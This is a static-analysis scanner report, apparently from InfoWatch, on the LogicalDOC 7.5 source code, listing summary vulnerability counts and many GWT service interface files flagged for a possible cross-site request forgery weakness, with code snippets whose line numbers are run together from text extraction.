report on found vulnerabilities - infowatch...4 the report on detected vulnerabilities files java:...

Report on found vulnerabilities

Reporting period: 07.07.2016 - 08.07.2016Scanned files: 3579Files by language:

Java 1020JavaScript 37Transact-SQL 8

2 The report on detected vulnerabilities FILES

File name Files Lines Vulnerabilities by severity

logicaldoc-7.5-src.zipMD5: b9ef2a8605d1af408d034fee712abc8a

3579 282948 High = 111Medium = 7Low = 61

2 The report on detected vulnerabilities CHARTS


Java: Defending against Cross-site Request Forgery using GWTSeverity: highLanguage: JavaShort description: HTTP does not have standard mechanisms for checking whether the user sent a request on purpose or not. This way, the malicious user can force the user's browser to send a request to a given server without the user knowing.Full description: https://localhost:443/scanner/article?articleName=/en/Java/GwtCsrf.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-dropbox/src/main/java/com/logicaldoc/dropbox/DropboxServiceImpl.javaCode:

39 * Implementation of the DropboxService40 * 41 * @author Marco Meschieri - Logical Objects42 * @since 7.043 */44public class DropboxServiceImpl extends RemoteServiceServlet implements DropboxService {45 private static final long serialVersionUID = 1L;4647 private static Logger log = LoggerFactory.getLogger(DropboxServiceImpl.class);4849 @Override50 public boolean isConnected() throws ServerException {51 Session session = SessionUtil.validateSession(getThreadLocalRequest());5253 try {54 Dropbox dbox = new Dropbox();55 String accessToken = loadAccessToken(session.getUser());56 if (accessToken == null)57 return false;58 return dbox.login(accessToken, session.getUser().getLocale());59 } catch (Throwable t) {60 log.error(t.getMessage(), t);61 throw new RuntimeException(t.getMessage(), t);62 }63 }6465 @Override66 public String startAuthorization() throws ServerException {67 Session session = SessionUtil.validateSession(getThreadLocalRequest());6869 try {70 Dropbox dbox = new Dropbox();71 return dbox.startAuthorization(session.getUser().getLocale());72 } catch (Throwable t) {73 log.error(t.getMessage(), t);74 throw new RuntimeException(t.getMessage(), t);75 }76 }7778 @Override79 public String finishAuthorization(String authorizationCode) throws ServerException {80 Session session = SessionUtil.validateSession(getThreadLocalRequest());8182 try {83 User user = session.getUser();84 Dropbox dbox = new Dropbox();85 String token = dbox.finishAuthorization(authorizationCode, user.getLocale());86 if (token == null)87 return null;87...

https://localhost:443/scanner/article?articleName=/en/Java/GwtCsrf.html

https://localhost:443/scanner/article?articleName=/en/Java/GwtCsrf.html


File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/common/client/services/InfoService.javaCode:

11 * 12 * @author Marco Meschieri - Logical Objects13 * @since 6.0.014 */15@RemoteServiceRelativePath("info")16public interface InfoService extends RemoteService {17 /**18 * Retrieves the system informations19 */20 public GUIInfo getInfo(String locale, String tenant);2122 public GUIParameter[] getSessionInfo() throws InvalidSessionException;23}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/common/client/services/SecurityService.javaCode:

13/**14 * The client side stub for the Security Service. This service gives all needed15 * methods to handle user sessions.16 */17@RemoteServiceRelativePath("security")18public interface SecurityService extends RemoteService {19 /**20 * Logs-in a user by an existing session ID (session reuse)21 *22 */23 public GUISession getSession(String locale);2425 /**26 * Changes the password of a user27 * 28 * @param userId The user Identifier29 * @param oldPassword can be null30 * @param newPassword31 * @param notify If the new credentials need to be notified32 * @return 0 if all is ok, 1 if the password is incorrect, 2 if the new33 * password cannot be notified, otherwise a positive number grater34 * than 235 */36 public int changePassword(long userId, String oldPassword, String newPassword, boolean notify);3738 /**39 * Logs out the current user40 */41 public void logout();4243 /**44 * Deletes a given user45 */46 public void deleteUser(long userId) throws ServerException;4748 /**49 * Creates or updates a user50 */51 public GUIUser saveUser(GUIUser user, GUIInfo info) throws ServerException;5253 /**54 * Saves the profile data only


55 */56 public GUIUser saveProfile(GUIUser user) throws ServerException;5758 /**59 * Loads a given user from the database60 */61 public GUIUser getUser(long userId) throws ServerException;61...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/AnnotationsService.javaCode:

9 * 10 * @author Marco Meschieri - Logical Objects11 * @since 7.212 */13@RemoteServiceRelativePath("annotations")14public interface AnnotationsService extends RemoteService {1516 /**17 * Prepares the system to accept annotations for the given document18 * 19 * @param docId The document to elaborate20 * @param fileVersion Optional file version specification21 * @return The number of document's pages22 * @throws ServerException23 */24 public int prepareAnnotations(long docId, String fileVersion) throws ServerException;2526 /**27 * Adds a new annotation in the given page28 * 29 * @param docId The document identifier30 * @param page The current page31 * @param snippet A snippet of the selected text32 * @param text The annotation's text33 * 34 * @return The new annotation's ID35 * @throws ServerException36 */37 public long addAnnotation(long docId, int page, String snippet, String text) throws ServerException;3839 /**40 * Saves the page with annotations41 * 42 * @param docId The document identifier43 * @param page The current page44 * @param content The page's content45 * 46 * @throws ServerException47 */48 public void savePage(long docId, int page, String content) throws ServerException;49}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/AttributeSetService.javaCode:

9/**10 * The client side stub for the AttributeSet Service. This service gives all11 * needed methods to handle attribute sets.12 */13@RemoteServiceRelativePath("attributeset")14public interface AttributeSetService extends RemoteService {


15 /**16 * Deletes a given set17 */18 public void delete(long setId) throws ServerException;1920 /**21 * Creates or updates a set22 */23 public GUIAttributeSet save(GUIAttributeSet set) throws ServerException;2425 /**26 * Loads a given set from the database27 */28 public GUIAttributeSet getAttributeSet(long setId) throws ServerException;2930 /**31 * Saves the list of all possible options32 */33 public void saveOptions(long setId, String attribute, String[] values) throws ServerException;3435 /**36 * Delete a selection of options37 */38 public void deleteOptions(long setId, String attribute, String[] values) throws ServerException;3940 /**41 * Reads the contacts that are about to be imported from CSV42 */43 public String[] parseOptions(long setId, String attribute) throws ServerException;44}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/BarcodeService.javaCode:

11 * 12 * @author Marco Meschieri - Logical Objects13 * @since 6.114 */15@RemoteServiceRelativePath("barcode")16public interface BarcodeService extends RemoteService {17 /**18 * Loads a bean that contains all engine infos.19 */20 public GUIBarcodeEngine getInfo() throws ServerException;2122 /**23 * Saves the engine settings24 */25 public void save(GUIBarcodeEngine engine) throws ServerException;2627 /**28 * Reschedule all documents for processing29 */30 public void rescheduleAll() throws ServerException;3132 /**33 * Marks a set of documents as not processable.34 */35 public void markUnprocessable(long[] ids) throws ServerException;3637 /**38 * Loads the patterns configured for a given template.39 */40 public GUIBarcodePattern[] loadPatterns(Long templateId) throws ServerException;41


42 /**43 * Saves the patterns for the given template ordered by position44 */45 public void savePatterns(String[] patterns, Long templateId) throws ServerException;4647}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/CalendarService.javaCode:

13 * 14 * @author Marco Meschieri - Logical Objects15 * @since 6.716 */17@RemoteServiceRelativePath("calendar")18public interface CalendarService extends RemoteService {1920 /**21 * Saves an event22 */23 public void saveEvent(GUICalendarEvent event) throws ServerException;2425 /**26 * Gets an event27 */28 public GUICalendarEvent getEvent(long eventId) throws ServerException;2930 /**31 * Searches for events.32 * 33 * @param startDate Start date (optional)34 * @param endDate End date (optional)35 * @param expireFrom (optional)36 * @param expireTo (optional)37 * @param frequency The frequency of the event (1,15, 30 ... optional)38 * @param title The title (used with like operator, optional)39 * @param type The type (used with like operator, optional)40 * @param subtype The subtype (used with like operator, optional)41 * @param status The title (used with like operator, optional)42 * @param maxRecords Maximum number of records (optional)43 * 44 * @return The list of events ordered by ascending date45 */46 public GUICalendarEvent[] find(Date startDate, Date endDate, Date expireFrom, Date expireTo,47 Integer frequency, String title, String type, String subtype, Integer status, Integer maxRecords) throws ServerException;4849 /**50 * Deletes an event. If the event is a master, in any case all the51 * occurrences will be deleted too.52 */53 public void deleteEvent(long eventId) throws ServerException;5455 /**56 * Counts the number of events that start from now until a given date.57 * 58 * @param username The user to be processed59 * @param end The and date60 * @return The number of found events61 * 61...


File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/ContactService.javaCode:

11 * 12 * @author Marco Meschieri - Logical Objects13 * @since 6.014 */15@RemoteServiceRelativePath("contact")16public interface ContactService extends RemoteService {17 /**18 * Deletes a selection of contacts19 */20 public void delete(long[] ids) throws ServerException;2122 /**23 * Saves a contact in the database24 */25 public void save(GUIContact contact) throws ServerException;2627 /**28 * Loads a contact from the database29 */30 public GUIContact load(long id) throws ServerException;3132 /**33 * Reads the contacts that are about to beimported from CSV file34 */35 public GUIContact[] parseContacts(boolean preview, String separator, String delimiter,36 boolean skipFirstRow, int firstName, int lastName, int email, int company, int phone, int mobile,37 int address) throws ServerException;38}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/CustomIdService.javaCode:

9/**10 * The client side stub for the CustomIdService Service. This service gives all11 * needed methods to handle custom ids configutations.12 */13@RemoteServiceRelativePath("customid")14public interface CustomIdService extends RemoteService {15 /**16 * Deletes a given configuration17 */18 public void delete(long templateId, String type) throws ServerException;1920 /**21 * Creates or updates a configuration22 */23 public void save(GUICustomId customid) throws ServerException;2425 /**26 * Loads a given configuration from the database27 */28 public GUICustomId get(long templateId, String type) throws ServerException;2930 /**31 * Load all CustomIds rules32 */33 public GUICustomId[] load() throws ServerException;3435 /**36 * Reset the numbering of a given sequence37 */38 public void resetSequence(long sequenceId, long value) throws ServerException;


3940 /**41 * Loads the list of sequences42 */43 public GUISequence[] loadSequences() throws ServerException;4445 /**46 * Deletes the given sequence47 */48 public void deleteSequence(long sequenceId) throws ServerException;49}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/DocumentService.javaCode:

18 * 19 * @author Marco Meschieri - Logical Objects20 * @since 6.021 */22@RemoteServiceRelativePath("document")23public interface DocumentService extends RemoteService {24 /**25 * Retrieves a specific document by its ID26 */27 public GUIDocument getById(long docId) throws ServerException;2829 /**30 * Saves the document in the DB31 * 32 * @param document The document to save33 * @return The saved document34 */35 public GUIDocument save(GUIDocument document) throws Exception;3637 /**38 * Retrieves all attributes of the specified template39 */40 public GUIAttribute[] getAttributes(long templateId) throws ServerException;4142 /**43 * Retrieves two specific versions by its ID44 */45 public GUIVersion[] getVersionsById(long id1, long id2) throws ServerException;4647 /**48 * Sends a document as email(attachment or download ticket)49 * 50 * @return "ok" otherwise an error code51 */52 public String sendAsEmail(GUIEmail email, String locale) throws ServerException;5354 /**55 * Updates the links type56 * 57 * @param id The link identifier58 * @param type The new type to be set59 */60 public void updateLink(long id, String type) throws ServerException;6162 /**63 * Deletes a selection of links64 */65 public void deleteLinks(long[] ids) throws ServerException;6666...


File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/DropboxService.javaCode:

9 * 10 * @author Marco Meschieri - Logical Objects11 * @since 7.012 */13@RemoteServiceRelativePath("dropbox")14public interface DropboxService extends RemoteService {15 /**16 * Checks if the user has connected the LogicalDOC application to his17 * Dropbox account.18 */19 public boolean isConnected() throws ServerException;2021 /**22 * Starts the authorization process and returns the Dropbox authorization23 * page URL to be shown to the user.24 */25 public String startAuthorization() throws ServerException;2627 /**28 * Ends the authorization code and saves the access token in the database.29 */30 public String finishAuthorization(String authorizationCode) throws ServerException;3132 /**33 * Exports documents and folders into Dropbox34 * 35 * @param sid The session ID36 * @param targetPath the target path in Dropbox (must be a folder)37 * @param folderIds Ids of the folders to be imported (all subfolders and38 * docs will be imported as well39 * @param docIds Ids of the documents to be imported40 * @return41 * @throws ServerException42 */43 public boolean exportDocuments(String targetPath, long[] folderIds, long[] docIds)44 throws ServerException;45 46 public int importDocuments(long targetFolder, String[] paths)47 throws ServerException;48}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/EmailAccountService.javaCode:

8/**9 * The client side stub for the EmailAccount Service. This service gives all10 * needed methods to handle templates.11 */12@RemoteServiceRelativePath("emailaccount")13public interface EmailAccountService extends RemoteService {14 /**15 * Deletes a given account16 */17 public void delete(long id) throws ServerException;1819 /**20 * Creates or updates an account21 */22 public GUIEmailAccount save(GUIEmailAccount account) throws ServerException;2324 /**


25 * Loads a given account from the database26 */27 public GUIEmailAccount get(long id) throws ServerException;2829 /**30 * Test the connection to the given account31 */32 public boolean test(long id) throws ServerException;3334 /**35 * Changes an account enabled/disabled status36 */37 public void changeStatus(long id, boolean enabled) throws ServerException;3839 /**40 * Cleans the cache41 */42 public void resetCache(long id) throws ServerException;43}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/FolderService.javaCode:

12 * 13 * @author Marco Meschieri - Logical Objects14 * @since 6.015 */16@RemoteServiceRelativePath("folder")17public interface FolderService extends RemoteService {18 /**19 * Saves the folder in the DB20 * 21 * @param folder The folder to save22 * @return The saved folder23 */24 public GUIFolder save(GUIFolder folder) throws ServerException;2526 /**27 * Creates a new folder28 * 29 * @param newFolder The folder to be created30 * @param inheritSecurity True if the new folder has to inherit the security31 * policies from the parent32 * @return The saved folder33 */34 public GUIFolder create(GUIFolder newFolder, boolean inheritSecurity) throws ServerException;3536 /**37 * Creates a new folder alias38 * 39 * @param parentId The folder in which the alias must be created40 * @param foldRef The original folder41 * @return The created alias42 */43 public GUIFolder createAlias(long parentId, long foldRef) throws ServerException;4445 /**46 * Renames the given folder47 */48 public void rename(long folderId, String name) throws ServerException;4950 /**51 * Applies all security settings to folder52 * 53 * @param folder The folder that contains the new security settings54 * @param subfolders If true, the current security settings will be applied


55 * to the sub-folders56 */57 public void applyRights(GUIFolder folder, boolean subfolders) throws ServerException;5859 /**60 * Inherits the rights of another folder60...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/FormService.javaCode:

8/**9 * The client side stub for the Form Service. This service gives all needed10 * methods to handle the forms.11 */12@RemoteServiceRelativePath("form")13public interface FormService extends RemoteService {14 /**15 * Creates a new form16 */17 public GUIDocument create(GUIDocument form) throws ServerException;1819 /**20 * Creates a form21 */22 public void delete(long formId) throws ServerException;23}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/GDriveService.javaCode:

10 * 11 * @author Marco Meschieri - LogicalDOC12 * @since 7.313 */14@RemoteServiceRelativePath("gdrive")15public interface GDriveService extends RemoteService {1617 /**18 * Uploads a document to Google Drive.19 * 20 * @param docId ID of the document to upload21 * 22 * @returns The resourceId of the uploaded document23 */24 public String upload(long docId) throws ServerException;2526 /**27 * Deletes a document in Google Drive.28 * 29 * @param docId ID of the document to delete30 */31 public void delete(String resourceId) throws ServerException;3233 /**34 * Performs the check-in of a Google Drives's document into the LogicalDOC35 * repository.36 * 37 * @param docId ID of the document to update38 * @param comment The comment left for the checkin39 * @param major If this is a major or minor release40 * 41 * @return The checked-in document42 */


43 public GUIDocument checkin(long docId, String comment, boolean major) throws ServerException;4445 /**46 * Imports some Google documents into LogicalDOC47 * 48 * @param resourceIds IDS of the documents to import49 * @param targetFolderId ID of the import folder50 * @param format The type of the documents51 */52 public void importDocuments(String[] resourceIds, long targetFolderId, String format)53 throws ServerException;5455 /**56 * Exports a selection of documents from LogicalDOC into GoogleDocs57 * 58 * @param ids The ids of the document to be exported58...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/ImpexService.javaCode:

12 * 13 * @author Marco Meschieri - Logical Objects14 * @since 6.015 */16@RemoteServiceRelativePath("impex")17public interface ImpexService extends RemoteService {18 /**19 * Deletes a specific archive by its ID20 */21 public void delete(long archiveId) throws ServerException;2223 /**24 * Deletes a set of versions from the given archive25 */26 public GUIArchive deleteVersions(long archiveId, Long versionIds[]) throws ServerException;2728 /**29 * Change the status of the given Archive30 */31 public void setStatus(long archiveId, int status) throws ServerException;3233 /**34 * Saves/Updates a given archive35 */36 public GUIArchive save(GUIArchive archive) throws ServerException;3738 /**39 * Loads a given archive40 */41 public GUIArchive load(long archiveId) throws ServerException;4243 /**44 * Adds a set of documents(their current versions) to the given archive45 */46 public void addDocuments(long archiveId, long[] documentIds) throws ServerException;4748 /**49 * Adds a a folder(the current version of the contained documents at any level).50 */51 public void addFolder(long archiveId, long rootId) throws ServerException;52 53 /**54 * Deletes a given incremental configuration55 */


56 public void deleteIncremental(long id) throws ServerException;5758 /**59 * Loads an incremental configuration60 */60...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/ImportFolderService.javaCode:

8/**9 * The client side stub for the ImportFolder Service. This service gives all10 * needed methods to handle import folders.11 */12@RemoteServiceRelativePath("importfolder")13public interface ImportFolderService extends RemoteService {14 /**15 * Deletes a given folder16 */17 public void delete(long id) throws ServerException;1819 /**20 * Creates or updates an import folder21 */22 public GUIImportFolder save(GUIImportFolder share) throws ServerException;2324 /**25 * Loads a given import folder from the database26 */27 public GUIImportFolder getImportFolder(long id) throws ServerException;2829 /**30 * Test the connection to the given import folder31 */32 public boolean test(long id) throws ServerException;3334 /**35 * Changes a importFolder enabled/disabled status36 */37 public void changeStatus(long id, boolean enabled) throws ServerException;3839 /**40 * Cleans the cache41 */42 public void resetCache(long id) throws ServerException;43}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/LdapService.javaCode:

910/**11 * The client side stub for the LdapService.12 */13@RemoteServiceRelativePath("ldap")14public interface LdapService extends RemoteService {15 /**16 * Saves external authentication settings17 */18 public void saveSettings(GUILdapSettings ldapSettings) throws ServerException;1920 /**21 * Tests the connection22 */


23 public boolean testConnection(GUILdapSettings ldapSettings) throws ServerException;2425 /**26 * Loads external authentication settings27 */28 public GUILdapSettings loadSettings() throws ServerException;2930 /**31 * Search for users in the LDAP repository32 * 33 * @login used with LIKE operator to restrict the search34 */35 public GUIUser[] listUsers(String login) throws ServerException;3637 /**38 * Imports a selection of users39 * 40 * @param sid The session identifier41 * @param usernames The list of usernames to import42 * @param tenantId Tenant the users need to be imported in43 * 44 * @return Number of imports, updates, errors.45 */46 public GUIValue[] importUsers(String[] usernames, long tenantId) throws ServerException;47}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/MessageService.javaCode:

12 * 13 * @author Marco Meschieri - Logical Objects14 * @since 6.015 */16@RemoteServiceRelativePath("message")17public interface MessageService extends RemoteService {1819 /**20 * Gets the Message21 */22 public GUIMessage getMessage(long messageId, boolean markAsRead) throws ServerException;2324 /**25 * Deletes a list of Messages26 */27 public void delete(long[] ids) throws ServerException;2829 void save(GUIMessage message, long[] recipientIds) throws ServerException;3031 /**32 * Loads the templates configured for a given language.33 */34 public GUIMessageTemplate[] loadTemplates(String language) throws ServerException;3536 /**37 * Saves the given templates38 */39 public void saveTemplates(GUIMessageTemplate[] templates) throws ServerException;4041 /**42 * Deletes a selection of templates43 */44 public void deleteTemplates(long[] ids) throws ServerException;45}


File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/ReportService.javaCode:

9/**10 * The client side stub for the Report Service. This service gives all needed11 * methods to handle reports.12 */13@RemoteServiceRelativePath("report")14public interface ReportService extends RemoteService {15 /**16 * Deletes a given report17 */18 public void delete(long id) throws ServerException;1920 /**21 * Updates a report22 */23 public GUIReport save(GUIReport report) throws ServerException;2425 /**26 * Store the uploaded design file in the given report27 */28 public void storeUploadedDesign(long id) throws ServerException;2930 /**31 * Creates a new report32 */33 public GUIReport create(GUIReport report) throws ServerException;3435 /**36 * Loads a given report from the database37 */38 public GUIReport getReport(long id, boolean withLog) throws ServerException;3940 /**41 * Loads all the reports42 */43 public GUIReport[] getReports() throws ServerException;4445 /**46 * Loads the attributes defined in the given report47 */48 public GUIAttribute[] getReportParameters(long id) throws ServerException;4950 /**51 * Changes a report enabled/disabled status52 */53 public void changeStatus(long id, boolean enabled) throws ServerException;5455 /**56 * Processes a report57 */57...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/RetentionPoliciesService.javaCode:

8/**9 * The client side stub for the RetentionPolicies Service. This service gives10 * all needed methods to handle the retention policies.11 */12@RemoteServiceRelativePath("retentionpolicies")13public interface RetentionPoliciesService extends RemoteService {14 /**


15 * Deletes a given policy16 */17 public void delete(long id) throws ServerException;1819 /**20 * Creates or updates a retention policy21 */22 public GUIRetentionPolicy save(GUIRetentionPolicy policy) throws ServerException;2324 /**25 * Loads a given policy from the database26 */27 public GUIRetentionPolicy getPolicy(long id) throws ServerException;2829 /**30 * Reorder the policies31 */32 public void reorder(long[] ids) throws ServerException;33 34 /**35 * Changes a policy enabled/disabled status36 */37 public void changeStatus(long id, boolean enabled) throws ServerException;3839}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/SearchEngineService.javaCode:

10 * 11 * @author Matteo Caruso - Logical Objects12 * @since 6.013 */14@RemoteServiceRelativePath("searchengine")15public interface SearchEngineService extends RemoteService {16 /**17 * Loads a search engine that contains all search engine infos.18 */19 public GUISearchEngine getInfo() throws ServerException;2021 /**22 * Unlocks the indexer.23 */24 public void unlocks() throws ServerException;2526 /**27 * Checks the indexer.28 */29 public String check() throws ServerException;3031 /**32 * Reschedule all entries for indexing.33 */34 public void rescheduleAll(boolean dropIndex) throws ServerException;3536 /**37 * Saves search engine settings38 */39 public void save(GUISearchEngine searchEngine) throws ServerException;4041 /**42 * Changes the activation status of a language43 */44 public void setLanguageStatus(String language, boolean active) throws ServerException;4546 /**47 * Sets the parser aliases for the given extension. Aliases must be a


48 * comma-separated values.49 */50 public void setAliases(String extension, String aliases) throws ServerException;51}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/SearchService.javaCode:

11 * 12 * @author Marco Meschieri - Logical Objects13 * @since 6.014 */15@RemoteServiceRelativePath("search")16public interface SearchService extends RemoteService {1718 /**19 * Performs a search against the database20 * 21 * @param sid The current user session22 * @param options The search options23 * @return Result hits and statistics24 */25 public GUIResult search(GUISearchOptions options) throws ServerException;2627 /**28 * Saves the search options in the user's working dir29 * 30 * @param sid The current user session31 * @param options The search options32 * @return true if the operation was successful and there were no duplicates33 */34 public boolean save(GUISearchOptions options) throws ServerException;3536 /**37 * Deletes a previously saved search38 * 39 * @param sid The current user session40 * @param names The saved search names41 */42 public void delete(String[] names) throws ServerException;4344 /**45 * Loads a saved search46 * 47 * @param sid The current user session48 * @param name The saved search name49 * @return50 */51 public GUISearchOptions load(String name) throws ServerException;52}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/SettingService.javaCode:

13 * 14 * @author Matteo Caruso - Logical Objects15 * @since 6.016 */17@RemoteServiceRelativePath("setting")18public interface SettingService extends RemoteService {1920 /**21 * Loads web services, webDav and other client-related settings22 */


23 public GUIParameter[] loadClientSettings() throws ServerException;2425 /**26 * Loads the complete settings set27 */28 public GUIParameter[] loadSettings()throws ServerException;2930 /**31 * Loads a set of settings values32 * 33 * @param sid The current session identifier34 * @param names The setting names to be retrieved35 * @return The array of settings36 * @throws ServerException37 */38 public GUIParameter[] loadSettingsByNames(String[] names) throws ServerException;3940 /**41 * Saves settings42 */43 public void saveSettings(GUIParameter[] settings) throws ServerException;4445 /**46 * Loads email settings (SMTP connection)47 */48 public GUIEmailSettings loadEmailSettings()throws ServerException;4950 /**51 * Tests the SMTP connection52 * 53 * @param sid The session identifier54 * @param email email address to test(it will receive a test message)55 * @return True only if the email was sent56 */57 public boolean testEmail(String email) throws ServerException;5859 /**60 * Load the repositories paths.61 * 61...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/ShareFileService.javaCode:

9 * 10 * @author Marco Meschieri - Logical Objects11 * @since 7.2.112 */13@RemoteServiceRelativePath("sharefile")14public interface ShareFileService extends RemoteService {15 /**16 * Exports documents and folders into ShareFille17 * 18 * @param targetFolder the target folder in ShareFile19 * @param folderIds Ids of the folders to be imported (all subfolders and20 * docs will be imported as well21 * @param docIds Ids of the documents to be imported22 * @return23 * @throws ServerException24 */25 public boolean exportDocuments(String targetFolder, long[] folderIds, long[] docIds)26 throws ServerException;2728 public int importDocuments(long targetFolder, String[] itemIds) throws ServerException;2930 /**31 * Save the settings used by the FileShare module


32 * 33 * @param hostname34 * @param username35 * @param password36 * @throws ServerException37 */38 public void saveSettings(String hostname, String username, String password) throws ServerException;3940 /**41 * Retrieve the settings saved for connecting to FileShare.42 */43 public String[] loadSettings() throws ServerException;44}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/SignService.javaCode:

10 * 11 * @author Matteo Caruso - Logical Objects12 * @since 6.113 */14@RemoteServiceRelativePath("sign")15public interface SignService extends RemoteService {16 /**17 * Extracts the certificate subjects names from an uploaded .pem certificate18 * or .p7m file .19 * 20 * @param docId Id of signed document to verify (optional)21 * @param fileVersion The file version of the document to verify (optional)22 * @return Subjects names array.23 * @throws ServerException24 */25 public String[] extractSubjectSignatures(Long docId, String fileVersion) throws ServerException;2627 /**28 * Stores the user's certificate file associated to the given signer name.29 * 30 * @return 'ok' if no errors occurred, otherwise returns the error message.31 * @throws ServerException32 */33 public String storeSignature() throws ServerException;3435 /**36 * Signs the given documents37 * 38 * @param docIds The documents to be signed39 * @return 'ok' if no errors occurred, otherwise returns the error message.40 * @throws ServerException41 */42 public String signDocuments(long[] docIds) throws ServerException;4344 /**45 * Verifies the user signature file, checks if the uploaded file's digest46 * and the document's file digest are equals, then signs the document.47 * 48 * @param docId Identifier of the document to sign49 * @return 'ok' if no errors occurred, otherwise returns the error message.50 * @throws ServerException51 */52 public String storeSignedDocument(long docId) throws ServerException;5354 /**55 * Stores the private key of the given user56 * 57 * @param userid Identifier of the user that is saving the signature


58 * @param keyPassword The password to open the key (it the user uploads an58...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/StampService.javaCode:

8/**9 * The client side stub for the Stamp Service. This service gives all needed10 * methods to handle the stamps.11 */12@RemoteServiceRelativePath("stamp")13public interface StampService extends RemoteService {14 /**15 * Deletes a given stamp16 */17 public void delete(long id) throws ServerException;1819 /**20 * Creates or updates a stamp21 */22 public GUIStamp save(GUIStamp stamp) throws ServerException;2324 /**25 * Saves the stamp's image26 */27 public void saveImage(long stampId) throws ServerException;2829 /**30 * Loads a given stamp from the database31 */32 public GUIStamp getStamp(long id) throws ServerException;3334 /**35 * Changes a stamp enabled/disabled status36 */37 public void changeStatus(long id, boolean enabled) throws ServerException;3839 /**40 * Applies a stamp to the given document41 */42 public void applyStamp(long[] docIds, long stampId) throws ServerException;4344 /**45 * Remove users from stamp46 */47 public void removeUsers(long[] userIds, long stampId) throws ServerException;4849 /**50 * Assigns users to stamp51 */52 public void addUsers(long[] userIds, long stampId) throws ServerException;53}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/SystemService.javaCode:

16 * 17 * @author Matteo Caruso - Logical Objects18 * @since 6.019 */20@RemoteServiceRelativePath("system")21public interface SystemService extends RemoteService {2223 /**


24 * Retrieves all the statistics parameters.25 * 26 * <ol>27 * <li>The first array is the Repository statistics.</li>28 * <li>The second array is the Documents statistics.</li>29 * <li>The third array is the Folders statistics.</li>30 * <li>The fourth array contains the last run date.</li>31 * </ol>32 * 33 * @param sid The current user session34 * @param locale The current user locale35 */36 public GUIParameter[][] getStatistics(String locale) throws ServerException;3738 /**39 * Performs a search over the last changes.40 * 41 * @param sid The current user session42 * @param username The user name that must be associated to the history43 * @param from The starting date to search the histories44 * @param till The ending date to search the histories45 * @param maxResult The maximum number of history results46 * @param historySid The history session identifier47 * @param event The history events48 * @return Result hits and statistics49 */50 public GUIHistory[] search(String userName, Date from, Date till, int maxResult, String historySid,51 String[] event) throws ServerException;5253 /**54 * Retrieves all tasks.55 * 56 * @param sid The current user session57 * @param locale The current user locale58 */59 public GUITask[] loadTasks(String locale) throws ServerException;6061 /**62 * Starts the task execution.63 * 64 * @param taskName The task name64...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/TagService.javaCode:

11 * 12 * @author Marco Meschieri - Logical Objects13 * @since 6.014 */15@RemoteServiceRelativePath("tag")16public interface TagService extends RemoteService {1718 /**19 * Loads the tag cloud from the server20 */21 public GUITag[] getTagCloud() throws ServerException;2223 /**24 * Deletes an existing tag25 */26 public void delete(String tag) throws ServerException;2728 /**29 * Rename an existing tag to another label30 */


31 public void rename(String tag, String newTag) throws ServerException;3233 /**34 * Adds a new tag in the list of available tags.35 */36 public void addTag(String tag) throws ServerException;3738 /**39 * Removes an available from the list of available tags.40 */41 public void removeTag(String tag) throws ServerException;4243 /**44 * Gets the tag settings45 */46 public GUIParameter[] getSettings() throws ServerException;47}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/TemplateService.javaCode:

8/**9 * The client side stub for the Template Service. This service gives all needed10 * methods to handle templates.11 */12@RemoteServiceRelativePath("template")13public interface TemplateService extends RemoteService {14 /**15 * Deletes a given template16 */17 public void delete(long templateId) throws ServerException;1819 /**20 * Creates or updates a template21 */22 public GUITemplate save(GUITemplate template) throws ServerException;2324 /**25 * Loads a given template from the database26 */27 public GUITemplate getTemplate(long templateId) throws ServerException;28}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/TenantService.javaCode:

11 * 12 * @author Marco Meschieri - Logical Objects13 * @since 6.914 */15@RemoteServiceRelativePath("tenant")16public interface TenantService extends RemoteService {17 /**18 * Deletes a specific tenant by its ID19 */20 public void delete(long tenantId) throws ServerException;2122 /**23 * Saves/Updates a given tenant24 */25 public GUITenant save(GUITenant tenant) throws ServerException;2627 /**28 * Loads a given tenant


